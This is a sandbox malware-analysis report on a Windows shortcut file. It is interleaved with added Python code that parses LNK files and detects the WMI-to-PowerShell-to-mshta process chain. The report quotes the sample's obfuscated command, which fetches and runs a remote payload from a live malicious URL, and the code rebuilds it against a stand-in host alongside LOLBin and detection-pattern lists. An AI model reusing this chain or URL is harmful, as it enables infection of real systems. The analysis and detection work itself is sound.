Windows Analysis Report
K9esyY0r4G.lnk

Overview

General Information

Sample name: K9esyY0r4G.lnk (renamed because original name is a hash value)
Original sample name: ed0e0fc1ef780ad73eb559719a3621e1.lnk
Analysis ID: 1581246
MD5: ed0e0fc1ef780ad73eb559719a3621e1
SHA1: a739f5a4cb67f3b8ea5b4b5d08e35c4a60f8bd8c
SHA256: 6c8573069dadedd4fb861b3de01f94a87024f872fdd51652ad8959443851b333
Tags: lnk, user-abuse_ch

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WMIC.exe (PID: 7608 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7684 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7944 cmdline: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 8052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems), Tim Shelton. Data: Command: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, CommandLine: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7864, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, ProcessId: 7944, ProcessName: mshta.exe
Source: Process started. Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems). Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", ProcessId: 7608, ProcessName: WMIC.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7608, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), ProcessId: 7684, ProcessName: powershell.exe
Source: Process started. Author: vburov. Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8052, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: https://nextgencoding.cyou/asd/amber3, Avira URL Cloud: Label: malware
Source: https://nextgencoding.cyou/asd/amber3..., Avira URL Cloud: Label: malware
Source: K9esyY0r4G.lnk, Virustotal: Detection: 35%
Source: K9esyY0r4G.lnk, ReversingLabs: Detection: 21%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.1% probability
Source: unknown, HTTPS traffic detected: 104.21.67.124:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected: GET /asd/amber3 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: nextgencoding.cyou | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1 | Accept: */* | Referer: https://nextgencoding.cyou/asd/amber3 | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: nextgencoding.cyou | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1 | Accept: */* | Referer: https://nextgencoding.cyou/asd/amber3 | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: nextgencoding.cyou | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: nextgencoding.cyou
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 27 Dec 2024 08:03:45 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0FqQnREmqgQB3pJ%2FrKa9HJjbW4tJ6kkwAav53jATEL1UNCWKG53kOWgpsALlL7fRtY%2BbHiNOexqJo34L8Uw%2Bq7Rqhp4JP9AOA%2BFMxGFbOeEPCTmb1%2BvVWJWZzALxb5ggkkgumg%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8f87cbbeead24405-EWR
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: WMIC.exe, 00000000.00000002.1659185957.0000026AB22B0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"C:\Users\user\Desktop\K9esyY0r4G.lnkWinsta0\Defaultmemstr_b0ab49a0-a
Source: K9esyY0r4G.lnk, LNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine, Classification label: mal88.evad.winLNK@9/12@1/2
Source: C:\Windows\System32\mshta.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctsoiwi.yqy.ps1
Source: C:\Windows\System32\wbem\WMIC.exe, WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exe, File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
Source: C:\Windows\System32\wbem\WMIC.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3
Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, windows.storage.dll, wldp.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, dnsapi.dll, rasadhlp.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, jscript9.dll, d2d1.dll, dwrite.dll, d3d10warp.dll, dxcore.dll, secur32.dll, mlang.dll, windowscodecs.dll, uianimation.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator, the in-process COM object through which the WMI namespace is connected)
Source: K9esyY0r4G.lnk | LNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7D2325 push eax; iretd 4_2_00007FFD9B7D233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7D00AD pushad ; iretd 4_2_00007FFD9B7D00C1
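The "LNK file: ..\..\..\Windows\System32\Wbem\wmic.exe" entry above is the relative target path stored in the shortcut's StringData; the command line that drives wmic.exe sits in the neighbouring COMMAND_LINE_ARGUMENTS string, and the shortcut's ShowCommand decides whether the spawned console is visible. The script below is an added example (not Joe Sandbox's code): it parses those fields from a .lnk according to MS-SHLLINK, folds PowerShell 'a' + 'b' string concatenation so that a split "mshta" becomes matchable, and reports the indicators a triage analyst would look for. build_lnk() only exists to produce a constructed sample offline; the stage-2 URL, the LOLBin set and the argument patterns are assumptions chosen for illustration.

```python
"""Parse a Windows shortcut (MS-SHLLINK) and triage its target and arguments.
Added example, not Joe Sandbox's code. build_lnk() exists only so parse_lnk()
can be exercised offline on a constructed shortcut; the stage-2 URL, the LOLBin
set and the argument patterns are assumptions chosen for illustration."""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the spawned console out of view

LOLBINS = {"wmic.exe", "mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe",
           "regsvr32.exe", "cscript.exe", "wscript.exe", "certutil.exe"}
ARG_PATTERNS = {  # matched against the de-concatenated argument string
    "wmi process create": r"process\s+call\s+create",
    "mshta in arguments": r"\bmshta\b",
    "remote URL": r"https?://",
    "hidden window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",
}


def collapse_concat(s: str) -> str:
    """Fold 'a' + 'b' literal concatenations into 'ab' so split keywords become visible."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        folded = pat.sub(r"'\1\2'", s)
        if folded == s:
            return s
        s = folded


def parse_lnk(data: bytes) -> dict:
    """Decode the ShellLinkHeader and the StringData section of a .lnk file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: HeaderSize != 0x4C")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a shell link: LinkCLSID mismatch")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) + that many bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) includes itself
        off += struct.unpack_from("<I", data, off)[0]

    def string_data():  # CountCharacters (uint16) then the chars, no terminator
        nonlocal off
        count = struct.unpack_from("<H", data, off)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off + 2:off + 2 + count * width]
        off += 2 + count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    info = {"show_command": show_command}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        info[key] = string_data() if flags & bit else None
    return info


def triage(info: dict) -> list:
    """Return the names of the indicators present in a parsed shortcut."""
    findings = []
    target = (info.get("relative_path") or "").rsplit("\\", 1)[-1].lower()
    if target in LOLBINS:
        findings.append(f"target is LOLBin: {target}")
    raw = info.get("arguments") or ""
    if re.search(r"'\s*\+\s*'", raw):
        findings.append("string-concatenation obfuscation")
    folded = collapse_concat(raw)
    findings += [n for n, p in ARG_PATTERNS.items() if re.search(p, folded, re.I)]
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("window minimised (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed test input: a minimal Unicode .lnk carrying only RELATIVE_PATH
    and COMMAND_LINE_ARGUMENTS, the two StringData fields triage() relies on."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack(
        "<IIQQQIiIHHII", flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample: relative target wmic.exe, arguments assembling "mshta.exe <URL>"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\Wbem\wmic.exe",
    "process call create \"powershell -w 1 powershell -Command "
    "('ms' + 'hta' + '.exe ' + 'https://example.invalid/stage2')\"",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    for finding in triage(parse_lnk(SAMPLE_LNK)):
        print(" -", finding)
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their size prefixes rather than decoding them: the relative path and arguments are what a triage rule needs, and the ID list is where most parsing bugs in ad-hoc LNK tooling live. Note that "mshta" is only matched after collapse_concat() has folded the literals; a rule that looks for the keyword in the raw argument string misses this sample.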

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
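The process-creation entries and the Win32_Process::Create call above describe one chain, and the WMI hop is what makes it awkward to detect from process lineage alone: a process created through Win32_Process::Create is started by the WMI provider host, so its recorded parent is WmiPrvSE.exe rather than wmic.exe, and a rule keyed on "wmic.exe spawns powershell.exe" never fires. The script below is an added example (not Joe Sandbox's code) that rebuilds the tree from constructed Sysmon-style process-creation events, shows the broken lineage, restores the link through the command line that Win32_Process::Create passes on verbatim, and applies the rules a SOC would write for this chain. PIDs, the parent of WmiPrvSE.exe and the stage-2 URL are assumptions.

```python
"""Rebuild a process tree from process-creation events and flag the WMI-launched
LOLBin chain: wmic.exe -> Win32_Process.Create -> powershell.exe -> mshta.exe.
Added example, not Joe Sandbox's code. Events are constructed to mirror the chain
in this report; PIDs, the parent of WmiPrvSE.exe and the URL are assumptions.
Field names follow Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine)."""
import re
from collections import defaultdict


def ev(pid, ppid, image, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "CommandLine": cmdline}


# The argument handed to Win32_Process.Create reappears verbatim as the command line
# of the process WmiPrvSE.exe starts; that string is the only link back to wmic.exe.
INNER = "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://example.invalid/stage2')"
EVENTS = [  # constructed
    ev(4000, 3000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ev(4100, 4000, r"C:\Windows\System32\wbem\WMIC.exe",
       r'"C:\Windows\System32\Wbem\wmic.exe" process call create "' + INNER + '"'),
    # Win32_Process.Create runs inside the provider host, so the new process's parent
    # is WmiPrvSE.exe (itself a child of the WMI service svchost), never wmic.exe.
    ev(4200, 800, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
       r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"),
    ev(4300, 4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", INNER),
    ev(4400, 4300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command '
       + INNER.split("-Command ", 1)[1]),
    ev(4500, 4400, r"C:\Windows\System32\mshta.exe",
       r'"C:\Windows\System32\mshta.exe" https://example.invalid/stage2'),
]

SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}


def image_name(e):
    return e["Image"].rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """Index events by PID and by parent PID."""
    by_pid = {e["ProcessId"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e["ProcessId"])
    return by_pid, children


def parent_name(e, by_pid):
    p = by_pid.get(e["ParentProcessId"])
    return image_name(p) if p else None


def lineage(by_pid, pid):
    """Image names from pid upwards, stopping at the first ancestor we have no event for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


RULES = [  # (name, predicate over one event plus the PID index)
    ("wmic process call create", lambda e, b: image_name(e) == "wmic.exe"
        and re.search(r"process\s+call\s+create", e["CommandLine"], re.I)),
    ("WmiPrvSE spawned shell/LOLBin", lambda e, b: image_name(e) in SHELLS
        and parent_name(e, b) == "wmiprvse.exe"),
    ("powershell with concatenated string literals", lambda e, b:
        image_name(e) == "powershell.exe" and re.search(r"'\s*\+\s*'", e["CommandLine"])),
    ("powershell spawning mshta", lambda e, b: image_name(e) == "mshta.exe"
        and parent_name(e, b) == "powershell.exe"),
    ("mshta with remote URL", lambda e, b: image_name(e) == "mshta.exe"
        and re.search(r"https?://", e["CommandLine"], re.I)),
]


def detect(events):
    """Return (rule name, PID) for every event that satisfies a rule."""
    by_pid, _ = build_tree(events)
    return [(name, e["ProcessId"]) for e in events for name, cond in RULES if cond(e, by_pid)]


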